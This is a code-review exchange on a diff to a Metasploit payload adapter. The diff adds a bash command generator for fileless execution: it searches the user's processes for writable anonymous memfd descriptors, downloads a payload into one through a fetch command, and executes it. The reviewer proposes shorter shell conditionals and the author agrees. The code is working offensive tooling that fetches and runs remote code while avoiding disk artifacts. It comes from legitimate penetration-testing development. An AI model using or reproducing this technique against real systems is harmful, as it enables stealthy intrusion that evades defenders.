lib/msf/core/payload/adapter/fetch.rb

```diff
@@ -223,81 +231,136 @@ def _generate_certutil_command
     cmd + _execute_add
   end
 
+  # The idea behind fileless execution are anonymous files. The bash script will search through all processes owned by $USER and search from all file descriptor. If it will find anonymous file (contains "memfd") with correct permissions (rwx), it will copy the payload into that descriptor with defined fetch command and finally call that descriptor
+  def _generate_fileless(get_file_cmd)
+    # get list of all $USER's processes
+    cmd = 'FOUND=0'
+    cmd << ";for i in $(ps -u $USER | awk '{print $1}')"
+    # already found anonymous file where we can write
+    cmd << '; do if [ $FOUND -eq 0 ]'
+
+    # look for every symbolic link with write rwx permissions
+    # if found one, try to download payload into the anonymous file
+    # and execute it
+    cmd << '; then for f in $(find /proc/$i/fd -type l -perm u=rwx 2>/dev/null)'
+    cmd << '; do if [ $(ls -al $f | grep -o "memfd" >/dev/null; echo $?) -eq "0" ]'
+    cmd << "; then if [ $( #{get_file_cmd} >/dev/null; echo $?) -eq \"0\" ]"
```

Comment:
You should be able to golf this down. So using `$()` invokes the contents in a subshell. An exit status of `0` evaluates to true, so we can remove the echo and string check.

Give this a try:
```suggestion
    cmd << '; then for f in $(find /proc/$i/fd -type l -perm u=rwx 2>/dev/null)'
    cmd << '; do if $(ls -al $f | grep -o "memfd" >/dev/null)'
    cmd << "; then if $(#{get_file_cmd} >/dev/null)"
```

It could definitely be golf'ed down even more by removing whitespace and the redirection to null, but I think this is reasonable because it shouldn't change the functionality (output is still muted thanks to `/dev/null`) or affect the readability much.

For testing:
```
if $(exit 0); then echo true; else echo false; fi
```

Reply:
Yep, absolutely agree. The redirections to `/dev/null` are added because I didn't like the error messages as it complicated bit debugging. From functionality perspective, if there would be some issues with length, we can remove them as it shouldn't change anything. Thanks for the tip!